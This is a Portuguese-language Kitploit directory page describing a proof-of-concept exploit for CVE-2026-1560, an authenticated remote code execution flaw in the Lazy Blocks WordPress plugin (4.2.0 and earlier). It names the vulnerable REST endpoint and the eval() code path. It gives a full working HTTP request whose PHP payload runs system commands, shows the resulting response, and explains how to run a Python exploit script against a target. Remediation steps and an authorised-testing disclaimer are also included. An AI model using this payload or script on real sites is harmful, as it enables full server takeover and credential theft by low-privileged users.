Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0 — Prova de conceito de exploit para CVE-2026-1560, uma vulnerabilidade de execução remota de código autenticada no plugin Lazy Blocks para WordPress, que permite que usuários com privilégios baixos executem PHP arbitrário via REST API. | Kitploit
Ferramentas/GitHubGitHub/z3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubz3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0

CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0

Prova de conceito de exploit para CVE-2026-1560, uma vulnerabilidade de execução remota de código autenticada no plugin Lazy Blocks para WordPress, que permite que usuários com privilégios baixos executem PHP arbitrário via REST API.

Ver Repositório
2há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-1560 – Execução Remota de Código Autenticada no Custom Block Builder – Lazy Blocks ≤ 4.2.0

Pesquisador: ZeYROxXX

Plugin: Custom Block Builder – Lazy Blocks

Versões Afetadas: ≤ 4.2.0

Severidade: Alta

CVSS: 8.8

Tipo de Vulnerabilidade: Execução Remota de Código Autenticada (RCE)

Vetor de Ataque: API REST

Privilégio Necessário: edit_posts (Contribuidor+)


Referências

  • Aviso da Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lazy-blocks/custom-block-builder-lazy-blocks-420-authenticated-contributor-remote-code-execution

Resumo Executivo

Uma vulnerabilidade de alta severidade foi identificada no plugin WordPress Custom Block Builder – Lazy Blocks, afetando versões até e incluindo 4.2.0.
A vulnerabilidade permite que usuários autenticados com privilégios baixos (função de Contribuidor) executem código PHP arbitrário no servidor por meio de um endpoint da API REST destinado à funcionalidade de pré-visualização de blocos.

Este problema quebra completamente o modelo de privilégios do WordPress e pode levar ao .

comprometimento total do servidor

Endpoint Vulnerável

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/

O endpoint é acessível a qualquer usuário autenticado com a capacidade edit_posts.


Detalhes Técnicos

Verificação de Permissão

A rota REST é registrada com um callback de permissão fraco:

root@kitploit:~
'permission_callback' => array( $this, 'block_builder_preview_permission' )

Isso inclui Contribuidores, que nunca deveriam ter permissão para executar código PHP.


Caminho de Código Vulnerável

Controlador REST – classes/class-rest.php

root@kitploit:~
$block = $request->get_param( 'block' );

$block_result = lazyblocks()->blocks()->render_callback(
    $attributes,
    null,
    null,
    $context,
    $block_data
);

Renderizador de Blocos – classes/class-blocks.php

root@kitploit:~
public function php_eval( $code, $attributes, $context ) {
    ob_start();
    eval( '?>' . $code );
    return ob_get_clean();
}

A função eval() executa código PHP controlado pelo atacante sem sanitização ou validação.


Análise da Causa Raiz

O Lazy Blocks permite lógica de renderização PHP personalizada para blocos.
O endpoint de pré-visualização da API REST aceita definições de blocos fornecidas pelo usuário e não distingue entre blocos armazenados confiáveis e blocos de pré-visualização controlados pelo atacante.

Ao injetar atributos de bloco achatados, como:

  • code_output_method
  • code_editor_html

um atacante pode alcançar o ponto de execução php_eval() e executar código PHP arbitrário.


Prova de Conceito (HTTP)

Requisição:

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/ HTTP/1.1
Host: example.com
Content-Type: application/json
Authorization: Basic [Contributor_Credentials]

{
    "context": "editor",
    "block": {
        "slug": "exploit-block",
        "code_output_method": "php",
        "code_editor_html": "<?php echo 'VULNERABLE: ' . system('id'); ?>"
    }
}

Resposta:

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: application/json

{
    "success": true,
    "response": "<div useBlockProps>VULNERABLE: uid=33(www-data)...</div>"
}

✔ Execução arbitrária de comandos confirmada


Esta PoC é fornecida estritamente para fins de teste de segurança e pesquisa.


Impacto

Um atacante com acesso de Contribuidor pode:

  • Executar comandos arbitrários do sistema
  • Ler arquivos sensíveis (por exemplo, wp-config.php)
  • Modificar arquivos-fonte PHP
  • Escalar privilégios para administrador
  • Comprometer totalmente a instância WordPress

Remediação

  • Restringir a renderização PHP apenas a administradores
  • Remover o uso de eval() em entrada controlada pelo usuário
  • Impedir a pré-visualização REST de blocos contendo código PHP
  • Exigir a capacidade manage_options ou unfiltered_html
  • Substituir a execução PHP por mecanismos seguros de template

Uso (PoC em Python)

Requisitos

  • Python 3.x
  • Biblioteca requests
  • Credenciais válidas do WordPress com capacidade edit_posts (Contribuidor+)

Instalar dependência

root@kitploit:~
pip install requests

Executar o exploit

root@kitploit:~
python3 poc.py <target_url> <username> <password> "<command>"

Exemplo

root@kitploit:~
python3 poc.py https://victim.site contributor password "id"

Se o alvo for vulnerável, a saída do comando será retornada na resposta HTTP.

⚠️ Esta prova de conceito destina-se estritamente a testes de segurança autorizados e fins de pesquisa.

Baixar ferramenta